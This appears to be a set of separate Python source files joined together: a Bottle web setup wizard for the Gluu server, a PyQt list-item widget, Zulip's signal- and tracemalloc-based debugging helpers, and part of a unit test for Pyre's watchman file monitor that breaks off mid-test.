from messages import msg
# Make the bundled web-setup templates visible to bottle's template loader.
template_path = os.path.abspath('./templates/web_setup')
TEMPLATE_PATH.insert(0, template_path)
# install types
# NOTE: these sentinels are deliberately mixed-type — NONE/COMPLETED/ERROR
# are ints while LOCAL/REMOTE are the string values submitted by the web
# form. Elsewhere they are compared with both `==` and identity
# (`is not NONE`), so do not normalise them without auditing call sites.
NONE = 0
LOCAL = '1'
REMOTE = '2'
COMPLETED = -99
ERROR = -101
def middleware(functions):
    """Decorator factory running the given validators around a handler.

    The wrapped handler is ALWAYS invoked first (its return value serves as
    the fallback), then each validator in *functions* runs in order; the
    first truthy validator result is returned instead of the handler's own
    response.
    """
    def decorator(caller):
        def wrapper(*args, **kwargs):
            # The handler runs unconditionally — this matches the eager
            # evaluation of next()'s default in the original expression, so
            # validators can only replace its response, not prevent its
            # side effects.
            fallback = caller(*args, **kwargs)
            for check in functions:
                outcome = check(*args, **kwargs)
                if outcome:
                    return outcome
            return fallback
        return wrapper
    return decorator
def has_body(*args, **kwargs):
    """Validator: reject requests carrying no JSON body.

    Returns an error payload (picked up by the middleware wrapper) when the
    request body is missing or not JSON, and None when the body is present.
    """
    if request.json:
        return None
    response.status = 400
    return {
        'error': 'ValidationError',
        'error_message': 'Body is required (and must be JSON).',
    }
def body_req(required):
    """Build a validator checking that the *required* form fields are present.

    The returned closure is meant for the middleware() wrapper: it returns an
    error payload when validation fails and None when the request is valid,
    so the wrapped handler's own response is used on success. (Previously a
    truthy {'status': True} dict was always returned, which replaced the
    handler's response even on success — contrast has_body, which returns
    None on success.)
    """
    def inner(*args, **kwargs):
        errors = []
        for i in required:
            # Look the field up once instead of twice per check.
            value = request.forms.get(i)
            if value is None or value == '':
                errors.append({
                    'field': i, 'message': '{} is required.'.format(i)})
            if i == 'hostname' and value == 'localhost':
                errors.append({
                    'field': i, 'message': msg.enter_hostname_local})
        if errors:
            return {'status': False, 'errors': errors}
        # None -> middleware falls through to the handler's response.
        return None
    return inner
def validate_host(fields):
    """Build a validator for the host-settings form.

    Checks that every field in *fields* is present, that countryCode has at
    least two characters and oxtrust_admin_password at least six. Returns an
    error payload on failure and None on success, so the middleware() wrapper
    lets the handler's own response through (the old version always returned
    a truthy dict, masking the handler's response). The length checks are now
    skipped for missing fields, which previously raised TypeError
    (len(None)).
    """
    def inner(*args, **kwargs):
        errors = []
        for i in fields:
            value = request.forms.get(i)
            if value is None or value == '':
                errors.append({
                    'field': i, 'message': '{} is required.'.format(i)})
                # A missing field gets the single "required" error only.
                continue
            if i == 'countryCode' and len(value) < 2:
                errors.append({
                    'field': i, 'message': msg.enter_valid_countryCode})
            if i == 'oxtrust_admin_password' and len(value) < 6:
                errors.append({
                    'field': i, 'message': msg.oxtrust_admin_password_warning})
        if errors:
            return {'status': False, 'errors': errors}
        return None
    return inner
def validate_services(fields):
    """Build a required-fields validator for the services form.

    Returns None when all *fields* are present (letting the wrapped handler
    respond) and an error payload otherwise. (The old version always
    returned a truthy dict, which replaced the handler's response even on
    success.)
    """
    def inner(*args, **kwargs):
        errors = []
        for i in fields:
            value = request.forms.get(i)
            if value is None or value == '':
                errors.append({
                    'field': i, 'message': '{} is required.'.format(i)})
        if errors:
            return {'status': False, 'errors': errors}
        return None
    return inner
class GluuSetupApp:
    """Bottle application driving the Gluu web-based setup wizard.

    The routes collect configuration from the browser, validate it, store it
    on self.install_object (the setup backend, injected by the launcher
    before start()) and drive the installation in background threads,
    streaming progress back through self.queue.
    """

    def __init__(self):
        self._app = Bottle()
        self.host = '0.0.0.0'
        self.port = '8080'
        self._routes()
        self.exit_reason = str()
        self.my_counter = 0
        self.do_notify = True
        # Setup backend; assigned by the launcher before start().
        self.install_object = None
        # Progress tuples from worker threads, drained by the /install and
        # /get-log polling endpoints.
        self.queue = Queue()
        self.requirements = ('file_max', 'mem_size',
                             'number_of_cpu', 'free_disk_space')
        self._confirm_lisence = False
        # Fields mirrored between the wizard UI and the setup backend.
        self._myfields = ('lisence_confirm', 'ip', 'hostname',
                          'city', 'state', 'orgName', 'admin_email',
                          'countryCode', 'application_max_ram',
                          'oxtrust_admin_password', 'installHttpd',
                          'installSaml', 'installOxAuthRP',
                          'installPassport', 'installGluuRadius', 'installOxd',
                          'installCasa', 'oxd_url', 'wrends_install',
                          'wrends_password', 'wrends_hosts', 'cb_install',
                          'cb_admin', 'cb_password', 'cb_hosts')
        self.process = None
        self.status = None
        self.output = ''
        self.error = ''

    def start(self):
        """Run the bottle development server (blocking)."""
        self._app.run(host=self.host, port=self.port, debug=True)

    def _routes(self):
        """Register all wizard endpoints on the bottle app."""
        self._app.route('/', ['GET', 'POST'], callback=self.wizard)
        self._app.route('/initialize', 'GET', callback=self.initialize)
        self._app.route('/install', callback=self.installation)
        self._app.route('/storage_selection', ['GET', 'POST'],
                        callback=self.storage_selection)
        self._app.route('/display_summary', ['GET', 'POST'],
                        callback=self.display_summary)
        self._app.route('/installation', ['GET'],
                        callback=self.install_handler)
        self._app.route('/post-installation', 'GET',
                        callback=self.post_install_handler)
        self._app.route('/add-services', 'POST',
                        callback=self.add_services_handler)
        self._app.route('/get-log', 'GET',
                        callback=self.get_log)
        self._app.route('/quit', ['GET', 'POST'],
                        callback=self.shutdown)
        self._app.route('/collect-data/<step>', 'POST',
                        callback=self.collect_data)
        self._app.route('/collect-system-info', 'POST',
                        callback=self.collect_system_info)
        self._app.route('/collect-host', 'POST', callback=self.collect_host)
        self._app.route('/collect-services', 'POST',
                        callback=self.collect_services)
        self._app.route('/collect-database', 'POST',
                        callback=self.collect_database)
        self._app.route('/populate-dbbackend', 'GET',
                        callback=self.populate_dbbackend)

    def initialize(self):
        """Seed the wizard UI with current values from the setup backend."""
        if self.install_object.check_installed():
            return dict({'installed': True})
        fields = {}
        if not self.install_object.hostname:
            hostname = self.install_object.detect_hostname()
            self.install_object.hostname = hostname
        for k in self._myfields:
            value = getattr(self.install_object, k, None)
            if k == 'lisence_confirm':
                value = self._confirm_lisence
            fields.update({k: value})
        return dict(fields)

    def wizard(self):
        """Render the main wizard page, with system-requirement warnings."""
        data = {
            'msg': msg,
            'warning_text': None
        }
        for sys_req in self.requirements:
            cur_val = getattr(msg, 'current_' + sys_req)
            req_val = getattr(msg, 'suggested_' + sys_req)
            if cur_val < req_val:
                data['warning_text'] = getattr(
                    msg, 'insufficient_' + sys_req).format(cur_val, req_val)
                if sys_req == 'file_max':
                    # file_max is treated as a hard requirement: record the
                    # reason and shut the app down.
                    # BUGFIX: this previously read `self.shutdown` without
                    # calling it, which was a no-op.
                    self.exit_reason = data['warning_text']
                    time.sleep(3.5)
                    self.shutdown()
                data['warning_text'] += '. Do you want to continue?'
        return template('wizard.tpl', data)

    def collect_data(self, step=None):
        """Persist posted form fields onto the setup backend.

        BUGFIX: the route is declared as '/collect-data/<step>', so bottle
        passes a `step` keyword argument; the old signature had no such
        parameter and raised TypeError on every request. `step` is accepted
        and ignored — the field copy does not need it.
        """
        for k, v in request.forms.items():
            if k == 'application_max_ram':
                v = int(v)
            if k == 'lisence_confirm':
                self._confirm_lisence = strtobool(v)
                continue
            setattr(self.install_object, k, v)

    def object_response(self, message=None, error=False,
                        field=None, redirect=False, redirect_url=None):
        """Build the standard JSON response payload for the UI."""
        # Local name chosen so bottle's `response` object is not shadowed.
        payload = {'status': True}
        if error:
            payload.update({
                'status': False,
                'errors': {
                    'field': field,
                    'message': message
                }
            })
        if redirect:
            payload.update({'redirect_url': redirect_url})
        return dict(payload)

    @middleware([body_req({'hostname', 'ip', 'lisence_confirm'})])
    def collect_system_info(self):
        """Store hostname / ip / licence confirmation on the setup backend."""
        errors = {}
        for k, v in request.forms.items():
            if v == 'localhost':
                # NOTE(review): collected but never returned; the body_req
                # validator on this route already rejects 'localhost'.
                errors.update({'hostname': msg.enter_hostname_local})
            if k == 'lisence_confirm':
                self._confirm_lisence = strtobool(v)
                continue
            setattr(self.install_object, k, str(v))
        return self.object_response()

    @middleware([validate_host({
        'orgName', 'admin_email', 'city', 'state', 'countryCode',
        'application_max_ram', 'oxtrust_admin_password'})])
    def collect_host(self):
        """Store organisation / certificate form fields on the setup backend."""
        for k, v in request.forms.items():
            if k == 'application_max_ram':
                # int() only validates the number here; NOTE(review): the
                # value is still stored as str below — confirm downstream
                # code expects a string.
                v = int(v)
            setattr(self.install_object, k, str(v))
        return dict({'status': True})

    def collect_services(self):
        """Store service-selection flags; validate oxd when Casa is chosen."""
        params = request.forms
        for k, v in params.items():
            # oxd_url stays a string; everything else is a yes/no flag.
            v = str(v) if k == 'oxd_url' else bool(strtobool(v))
            setattr(self.install_object, k, v)
        if params.installCasa:
            # Casa needs oxd: either install it locally or point at one.
            if not params.installOxd and not params.oxd_url:
                return dict({
                    'status': False,
                    'errors': [{
                        'field': 'oxd_url',
                        'message': 'Casa Required Oxd'
                    }]
                })
            if not params.installOxd:
                # External oxd server: check connectivity and its TLS cert.
                oxd_server_https = params.oxd_url
                oxd_connection_result = self.install_object.check_oxd_server(oxd_server_https)
                if oxd_connection_result is not True:
                    return dict({
                        'status': False,
                        'errors': [{
                            'field': 'oxd_url',
                            'message': msg.oxd_connection_error.format(oxd_server_https, oxd_connection_result)
                        }]
                    })
                oxd_hostname, oxd_port = self.install_object.parse_url(oxd_server_https)
                oxd_ssl_result = self.install_object.check_oxd_ssl_cert(oxd_hostname)
                if oxd_ssl_result:
                    return dict({
                        'status': False,
                        'errors': [{
                            'field': 'oxd_url',
                            'message': msg.oxd_ssl_cert_error.format(oxd_ssl_result['CN'], oxd_hostname)
                        }]
                    })
                self.install_object.oxd_server_https = oxd_server_https
        oxd_hostname, oxd_port = self.install_object.parse_url(self.install_object.oxd_server_https)
        if not oxd_port:
            oxd_port = 8445  # default oxd https port when the url omits it
        self.install_object.templateRenderingDict['oxd_hostname'] = oxd_hostname
        self.install_object.templateRenderingDict['oxd_port'] = str(oxd_port)
        return dict({'status': True})

    def collect_database(self):
        """Store backend DB selections (WrenDS / Couchbase) and validate them."""
        params = request.forms
        # '0' from the form means "not selected"; normalise to the NONE
        # sentinel. (Assigning sets an attribute on the FormsDict instance,
        # which later attribute reads pick up in place of the form value.)
        if params.wrends_install == '0':
            params.wrends_install = NONE
        if params.cb_install == '0':
            params.cb_install = NONE
        msg.backed_types = []
        self.install_object.wrends_install = params.wrends_install
        if self.install_object.wrends_install == LOCAL:
            self.install_object.ldap_hostname = 'localhost'
            self.install_object.ldapPass = params.wrends_password
        elif self.install_object.wrends_install == REMOTE:
            self.install_object.ldap_hostname = params.wrends_hosts
            self.install_object.ldapPass = params.wrends_password
            result = self.install_object.check_remote_ldap(
                params.wrends_hosts,
                self.install_object.ldap_binddn,
                params.wrends_password)
            if not result['result']:
                return dict({
                    'status': False,
                    'errors': {
                        'field': 'wrends_hosts',
                        'message': result['reason']
                    }
                })
        self.install_object.cb_install = params.cb_install
        if self.install_object.cb_install == LOCAL:
            self.install_object.couchbase_hostname = 'localhost'
            self.install_object.cb_password = params.cb_password
        elif self.install_object.cb_install == REMOTE:
            self.install_object.couchbase_hostname = params.cb_hosts
            self.install_object.couchebaseClusterAdmin = params.cb_admin
            self.install_object.cb_password = params.cb_password
            result = self.install_object.test_cb_servers(params.cb_hosts)
            if not result['result']:
                return dict({
                    'status': False,
                    'errors': [{
                        'field': 'cb_hosts',
                        'message': result['reason']
                    }]
                })
        if self.install_object.cb_install is not NONE:
            self.install_object.cache_provider_type = 'NATIVE_PERSISTENCE'
            self.install_object.add_couchbase_post_messages()
        # NOTE(review): the sentinel checks below compare by identity with
        # the module-level NONE (0); they hold only when NONE itself was
        # assigned above.
        if self.install_object.wrends_install is not NONE and \
                not self.install_object.checkPassword(
                    self.install_object.ldapPass):
            return dict({
                'status': False,
                'errors': [{
                    'field': 'wrends_password',
                    'message': msg.weak_password.format('Wrends')
                }]
            })
        if self.install_object.cb_install is not NONE and \
                not self.install_object.checkPassword(
                    self.install_object.cb_password):
            return dict({
                'status': False,
                'errors': [{
                    'field': 'cb_password',
                    'message': msg.weak_password.format('Couchbase Server')
                }]
            })
        if self.install_object.wrends_install is not NONE or \
                self.install_object.cb_install is not NONE:
            if self.install_object.wrends_install is not NONE and \
                    self.install_object.cb_install is not NONE:
                # Both backends selected: the user must split the storages.
                self.install_object.persistence_type = 'hybrid'
                return dict({
                    'status': True,
                    'redirect_url': '/storage_selection'
                })
            else:
                # Single backend: map every storage onto it.
                storage_list = list(
                    self.install_object.couchbaseBucketDict.keys())
                storage = 'ldap'
                if self.install_object.cb_install is not NONE:
                    storage = 'couchbase'
                for s in storage_list:
                    self.install_object.mappingLocations[s] = storage
                self.install_object.persistence_type = storage
                return dict({
                    'status': True,
                    'redirect_url': '/display_summary'
                })
        else:
            return dict({
                'status': False,
                'errors': [{
                    'field': 'wrends_install',
                    'message': msg.notify_select_backend
                }]
            })

    def populate_dbbackend(self):
        """Return current DB-backend field values for pre-filling the form."""
        fields = {}
        if self.install_object.wrends_install == LOCAL:
            if not self.install_object.ldapPass:
                fields['wrends_password'] = self.install_object.oxtrust_admin_password
            else:
                fields['wrends_password'] = self.install_object.ldapPass
        fields['wrends_hosts'] = self.install_object.ldap_hostname
        if self.install_object.cb_install == LOCAL:
            if not self.install_object.cb_password:
                fields['cb_password'] = self.install_object.oxtrust_admin_password
        fields['cb_hosts'] = self.install_object.couchbase_hostname
        fields['cb_admin'] = self.install_object.couchebaseClusterAdmin
        return dict(fields)

    def storage_selection(self):
        """Let the user split storages between WrenDS and Couchbase."""
        data = {
            'title': msg.StorageSelectionForm_label,
            'note': msg.unselected_storages
        }
        if request.method == 'POST':
            storage_list = list(self.install_object.couchbaseBucketDict.keys())
            for i, s in enumerate(storage_list):
                # NOTE(review): this compares the storage index against the
                # indices 0..n-1 of the submitted form fields (i.e. against
                # the *count* of checked boxes), not against their values —
                # confirm the template posts indexed fields.
                if i in [k for k, v in enumerate(request.forms)]:
                    self.install_object.mappingLocations[s] = 'ldap'
                else:
                    self.install_object.mappingLocations[s] = 'couchbase'
            return redirect('display_summary')
        choices = []
        for i, s in enumerate(self.install_object.couchbaseBucketDict.keys()):
            choice = {'key': i, 'label': s}
            if self.install_object.mappingLocations[s] == 'ldap':
                choice.update({'checked': 'checked'})
            choices.append(choice)
        data.update({'choices': choices})
        return template('storage_selection', data)

    def display_summary(self):
        """Show the pre-installation summary; POST confirms and installs."""
        data = {
            'title': msg.DisplaySummaryForm_label,
        }
        if self.install_object.wrends_install is not NONE \
                and self.install_object.cb_install is not NONE:
            data.update({'back_url': '/storage_selection'})
        else:
            data.update({'back_url': '/'})
        if request.method == 'POST':
            self.install_object.check_properties()
            return redirect('/installation')
        myfields_1 = ("hostname", "orgName", "os_type", "city", "state",
                      "countryCode", "application_max_ram")
        myfields_2 = ("installOxAuth", "installOxTrust", "installHttpd",
                      "installSaml", "installOxAuthRP", "installPassport",
                      "installGluuRadius", "installOxd", "installCasa",
                      "java_type", "backend_types", "wrends_storages")
        specs = {}
        for field in myfields_1:
            label = getattr(msg, field + '_label')
            value = getattr(self.install_object, field)
            specs[label] = value
        data['specs'] = specs
        packages = {}
        for field in myfields_2:
            label = getattr(msg, field + '_label')
            if field == 'backend_types':
                bt_ = []
                if self.install_object.wrends_install == LOCAL:
                    bt_.append('wrends')
                elif self.install_object.wrends_install == REMOTE:
                    bt_.append('wrends[R]')
                if self.install_object.cb_install == LOCAL:
                    bt_.append('couchbase')
                elif self.install_object.cb_install == REMOTE:
                    bt_.append('couchbase[R]')
                value = ', '.join(bt_)
            elif field == 'wrends_storages':
                if self.install_object.wrends_install is not NONE \
                        and self.install_object.cb_install is not NONE:
                    wds_ = []
                    for k in self.install_object.mappingLocations:
                        if self.install_object.mappingLocations[k] == 'ldap':
                            wds_.append(k)
                    value = ', '.join(wds_)
                else:
                    # BUGFIX: `value` previously kept the preceding field's
                    # value here, showing a stale entry in the summary.
                    value = ''
            else:
                value = getattr(self.install_object, field)
            packages[label] = value
        data['packages'] = packages
        return template('display_summary', data)

    def install_handler(self):
        """Kick off the installation in a daemon thread; render progress UI."""
        data = {
            'title': msg.InstallStepsForm_label,
            'installing': msg.installing_label,
            'description': "",
            'progress_max_value': msg.installation_step_number + 1
        }
        t = threading.Thread(target=self.install_object.do_installation, args=(self.queue,))
        t.daemon = True
        t.start()
        return template('installation', data)

    def installation(self):
        """Poll endpoint: report installation progress from the queue.

        Returns an empty body when no new progress tuple is queued.
        """
        data = {}
        if not self.queue.empty():
            qdata = self.queue.get()
            if qdata[0] == COMPLETED:
                # NOTE(review): the joined post_messages are immediately
                # overwritten by installation_completed below — confirm
                # which message the UI should show.
                if self.install_object.post_messages:
                    data['message'] = '\n'.join(self.install_object.post_messages)
                data['progress_percentage'] = qdata[0]
                data['message'] = msg.installation_completed.format(self.install_object.hostname)
                data['installing'] = qdata[2]
                response.content_type = 'application/json'
                return json.dumps(data)
            elif qdata[0] == ERROR:
                data['progress_percentage'] = qdata[0]
                data['installing'] = qdata[2]
                data['message'] = msg.installation_error + "\n" + qdata[2]
                response.content_type = 'application/json'
                return json.dumps(data)
            data['progress_percentage'] = qdata[0]
            data['installing'] = qdata[2]
            if not data.get('description') or data['description'] != qdata[1]:
                if hasattr(msg, 'installation_description_' + qdata[1]):
                    desc = getattr(msg, 'installation_description_' + qdata[1])
                else:
                    desc = msg.installation_description_gluu
                data['description'] = '\n'.join(textwrap.wrap(text=desc))
            response.content_type = 'application/json'
            return json.dumps(data)

    def post_install_handler(self):
        """Render the post-installation page listing installable components."""
        data = {
            'title': 'Post Installation'
        }
        # Presence of each marker path indicates an installed component.
        services = {
            'installSaml': '/opt/shibboleth-idp',
            'installPassport': '/opt/gluu/node/passport',
            'installOxd': '/opt/oxd-server',
            'installCasa': '/opt/gluu/jetty/casa',
            'installGluuRadius': '/opt/gluu/radius/super-gluu-radius-server.jar'
        }
        components = []
        for service, path in services.items():
            components.append({
                'service': service,
                'installed': True if os.path.exists(path) else False,
                'label': getattr(msg, 'ask_' + service)
            })
        data.update({'components': components})
        return template('post_installation', data)

    def add_services_handler(self):
        """Start installing the components selected on the post-install page."""
        service_to_install = []
        # BUGFIX: request.json is None when no JSON body was sent; the old
        # `request.json.items()` check raised AttributeError in that case.
        if not request.json:
            return dict({'status': False, "message": "No component's to install"})
        for k, v in request.json.items():
            service_to_install.append(k)
        t = threading.Thread(target=self.add_service_task, args=(self.queue, service_to_install))
        t.daemon = True
        t.start()
        return dict({'status': True, 'service_to_install': service_to_install})

    def add_service_task(self, q, service_to_install):
        """Worker: run post-setup-add-components.py per selected service,
        streaming its stdout lines into the queue *q* as (service, line)."""
        args_for_installer = {
            'installSaml': ('addshib', 'SAML Shibboleth IDP'),
            'installPassport': ('addpassport', 'Passport'),
            'installOxd': ('addoxd', 'Oxd Server'),
            'installCasa': ('addcasa', 'Gluu Casa'),
            'installGluuRadius': ('addradius', 'Gluu Radius Server'),
        }
        for service in service_to_install:
            cmd = ["python3", "post-setup-add-components.py", "-{}".format(args_for_installer[service][0])]
            try:
                q.put((service, ' Installing {}'.format(service)))
                self.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                while self.process.poll() is None:
                    output = self.process.stdout.readline()
                    # NOTE(review): stdout yields bytes, so the '' comparison
                    # can never match; the poll() condition ends the loop.
                    if output == '' and self.process.poll() is not None:
                        break
                    if output:
                        q.put((service, output.strip().decode()))
            except subprocess.CalledProcessError:
                q.put((ERROR, 'something went wrong'))
        q.put((COMPLETED, 'done'))

    def get_log(self):
        """Poll endpoint: report add-service progress ((service, line) tuples)."""
        data = {}
        if not self.queue.empty():
            qdata = self.queue.get()
            data['progress_percentage'] = 10
            data['message'] = qdata[1]
            data['service'] = qdata[0]
            if qdata[0] == COMPLETED:
                data['progress_percentage'] = COMPLETED
                data['message'] = 'Installation Completed'
            elif qdata[0] == ERROR:
                data['progress_percentage'] = ERROR
                data['message'] = 'Opps something went wrong'
        response.content_type = 'application/json'
        return json.dumps(data)

    def shutdown(self):
        """Stop the bottle server.

        NOTE(review): Bottle's documented shutdown method is close();
        confirm the Bottle version in use actually provides stop().
        """
        self._app.stop()
|
_ItemWidget.py | import threading
import R
from Utils.WebUtil import setLabelImg
from ui.ui_designer.ui_file.uic_itemWidget import Ui_item
class _ItemWidget(Ui_item):
    """List-item widget showing one entry's title, latest episode and cover."""
    def __init__(self, params):
        """
        :param params: dict with keys 'url', 'title', 'latest', 'area',
            'time', 'stars'; init() additionally reads params['cover'].
        """
        self.params = params
        pass
    def init(self):
        print('params', self.params)
        # Set the title text
        # print(self.params['title'])
        self.lblTitle.setText(self.params['title'])
        # Also expose the full title as the tooltip
        self.lblTitle.setToolTip(self.params['title'])
        # Show the latest episode unless it equals the R.string.NONE sentinel
        if self.params['latest'].strip() == R.string.NONE:
            pass
        else:
            self.lblLatest.setText('最新至:' + self.params['latest'])
            pass
        # Load the cover image on a worker thread so the UI thread stays responsive
        t = threading.Thread(target=setLabelImg, name='', args=(self.lblCover, self.params['cover'],))
        t.start()
        print('添加 ' + self.params['title'] + '完成')
        pass
    pass
|
debug.py |
import code
import gc
import logging
import os
import signal
import socket
import threading
import traceback
import tracemalloc
from types import FrameType
from django.conf import settings
from django.utils.timezone import now as timezone_now
from typing import Optional
logger = logging.getLogger('zulip.debug')
# Interactive debugging code from
# http://stackoverflow.com/questions/132058/showing-the-stack-trace-from-a-running-python-application
# (that link also points to code for an interactive remote debugger
# setup, which we might want if we move Tornado to run in a daemon
# rather than via screen).
def interactive_debug(sig: int, frame: FrameType) -> None:
    """Interrupt running process, and provide a python prompt for
    interactive debugging."""
    # Build the shell namespace: the frame object itself, its globals, then
    # its locals (later updates win, so locals shadow globals).
    namespace = {'_frame': frame}
    namespace.update(frame.f_globals)
    namespace.update(frame.f_locals)
    banner = "Signal received : entering python shell.\nTraceback:\n"
    banner += ''.join(traceback.format_stack(frame))
    code.InteractiveConsole(namespace).interact(banner)
# SIGUSR1 => Just print the stack
# SIGUSR2 => Print stack + open interactive debugging shell
def interactive_debug_listen() -> None:
    """Install the debug signal handlers: SIGUSR1 prints the current stack,
    SIGUSR2 prints it and opens an interactive shell."""
    def _print_stack(sig: int, stack: FrameType) -> None:
        traceback.print_stack(stack)
    signal.signal(signal.SIGUSR1, _print_stack)
    signal.signal(signal.SIGUSR2, interactive_debug)
def tracemalloc_dump() -> None:
    """Dump a tracemalloc snapshot for this process into
    settings.TRACEMALLOC_DUMP_DIR and log a one-line memory summary."""
    if not tracemalloc.is_tracing():
        logger.warning("pid {}: tracemalloc off, nothing to dump"
                       .format(os.getpid()))
        return
    # Despite our name for it, `timezone_now` always deals in UTC.
    basename = "snap.{}.{}".format(os.getpid(),
                                   timezone_now().strftime("%F-%T"))
    path = os.path.join(settings.TRACEMALLOC_DUMP_DIR, basename)
    os.makedirs(settings.TRACEMALLOC_DUMP_DIR, exist_ok=True)
    # Collect first so the snapshot reflects live objects, not garbage.
    gc.collect()
    tracemalloc.take_snapshot().dump(path)
    with open('/proc/{}/stat'.format(os.getpid()), 'rb') as f:
        procstat = f.read().split()
    # /proc/<pid>/stat field 24 (index 23) is rss, in pages.
    rss_pages = int(procstat[23])
    # 1048576 = bytes per MiB; // 256 converts pages to MiB assuming
    # 4 KiB pages.
    logger.info("tracemalloc dump: tracing {} MiB ({} MiB peak), using {} MiB; rss {} MiB; dumped {}"
                .format(tracemalloc.get_traced_memory()[0] // 1048576,
                        tracemalloc.get_traced_memory()[1] // 1048576,
                        tracemalloc.get_tracemalloc_memory() // 1048576,
                        rss_pages // 256,
                        basename))
def tracemalloc_listen_sock(sock: socket.socket) -> None:
    """Block forever on *sock*; every datagram received triggers one
    tracemalloc snapshot dump (see tracemalloc_listen for setup)."""
    logger.debug('pid {}: tracemalloc_listen_sock started!'.format(os.getpid()))
    while True:
        sock.recv(1)  # payload is ignored; any datagram is the trigger
        tracemalloc_dump()
# PID of the process that installed the listener thread. Tracked so that a
# forked child (which inherits this module's globals but not the thread)
# sets up its own listener instead of relying on the parent's.
listener_pid = None  # type: Optional[int]
def tracemalloc_listen() -> None:
    """Start the background thread that serves snapshot-dump requests on a
    per-pid unix datagram socket. Idempotent within one process."""
    global listener_pid
    if listener_pid == os.getpid():
        # Already set up -- and in this process, not just its parent.
        return
    logger.debug('pid {}: tracemalloc_listen working...'.format(os.getpid()))
    listener_pid = os.getpid()
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
    path = "/tmp/tracemalloc.{}".format(os.getpid())
    # NOTE(review): bind() raises if the socket path already exists (e.g.
    # after an unclean restart) — confirm stale paths are cleaned up
    # elsewhere.
    sock.bind(path)
    # Daemon thread: must not keep the process alive on shutdown.
    thread = threading.Thread(target=lambda: tracemalloc_listen_sock(sock),
                              daemon=True)
    thread.start()
    logger.debug('pid {}: tracemalloc_listen done: {}'.format(
        os.getpid(), path))
def maybe_tracemalloc_listen() -> None:
    '''If tracemalloc tracing enabled, listen for requests to dump a snapshot.

    To trigger once this is listening:
        echo | socat -u stdin unix-sendto:/tmp/tracemalloc.$pid

    To enable in the Zulip web server: edit /etc/zulip/uwsgi.ini ,
    and add e.g. ` PYTHONTRACEMALLOC=5` to the `env=` line.
    This function is called in middleware, so the process will
    automatically start listening.

    To enable in other contexts: see upstream docs
    https://docs.python.org/3/library/tracemalloc .
    You may also have to add a call to this function somewhere.
    '''
    if not os.environ.get('PYTHONTRACEMALLOC'):
        return
    # Server was started with tracemalloc tracing on: accept dump requests.
    tracemalloc_listen()
|
project_files_monitor_test.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import json_rpc, project_files_monitor
from ..analysis_directory import UpdatedPaths
from ..json_rpc import Request, read_lsp_request
from ..project_files_monitor import MonitorException, ProjectFilesMonitor
from ..socket_connection import SocketConnection, SocketException
from ..tests.mocks import mock_configuration
class MonitorTest(unittest.TestCase):
    @patch.object(SocketConnection, "connect")
    @patch.object(json_rpc, "perform_handshake")
    # pyre-fixme[56]: Argument `tools.pyre.client.project_files_monitor` to
    # decorator factory `unittest.mock.patch.object` could not be resolved in a global
    # scope.
    @patch.object(project_files_monitor, "find_parent_directory_containing_file")
    def test_subscriptions(
        self,
        find_parent_directory_containing_file,
        perform_handshake,
        _socket_connection,
    ) -> None:
        """The monitor builds one watchman subscription covering the expected
        file suffixes (plus any configured extra extensions), and raises
        MonitorException when no watchman root can be found."""
        find_parent_directory_containing_file.return_value = "/ROOT"
        configuration = mock_configuration()
        analysis_directory = MagicMock()
        analysis_directory.get_root.return_value = "/ROOT"
        # no additional extensions
        configuration.extensions = []
        monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
        self.assertEqual(len(monitor._subscriptions), 1)
        subscription = monitor._subscriptions[0]
        self.assertEqual(subscription.root, "/ROOT")
        self.assertEqual(subscription.name, "pyre_file_change_subscription")
        self.assertEqual(subscription.subscription["fields"], ["name"])
        self.assertEqual(
            subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
        )
        # Order-insensitive check on the suffix clause.
        self.assertCountEqual(
            subscription.subscription["expression"][2],
            [
                "anyof",
                ["suffix", "py"],
                ["suffix", "pyi"],
                ["suffix", "thrift"],
                ["match", "TARGETS"],
            ],
        )
        # additional extensions
        configuration.get_valid_extension_suffixes = lambda: [".thrift", ".whl"]
        monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
        self.assertEqual(len(monitor._subscriptions), 1)
        subscription = monitor._subscriptions[0]
        self.assertEqual(subscription.root, "/ROOT")
        self.assertEqual(subscription.name, "pyre_file_change_subscription")
        self.assertEqual(subscription.subscription["fields"], ["name"])
        self.assertEqual(
            subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
        )
        self.assertCountEqual(
            subscription.subscription["expression"][2],
            [
                "anyof",
                ["suffix", "py"],
                ["suffix", "pyi"],
                ["suffix", "thrift"],
                ["suffix", "whl"],
                ["match", "TARGETS"],
            ],
        )
        # no watchman root -> terminate
        find_parent_directory_containing_file.return_value = None
        self.assertRaises(
            MonitorException,
            ProjectFilesMonitor,
            configuration,
            ".",
            analysis_directory,
        )
def test_bad_socket(self) -> None:
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
socket_connection = SocketConnection(bad_socket_path)
self.assertRaises(SocketException, socket_connection.connect)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path) -> None:
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
request = Request(
method="handshake/server",
parameters=json_rpc.ByNameParameters({"version": "123"}),
)
json_rpc.write_lsp_request(outfile, request)
response = read_lsp_request(infile)
if response.method != "handshake/client":
errors.append("Client handshake malformed")
return
request = Request(method="handshake/socket_added")
json_rpc.write_lsp_request(outfile, request)
updated_message = read_lsp_request(infile)
if (
updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
configuration = mock_configuration(version_hash="123")
configuration.log_directory = root + "/.pyre"
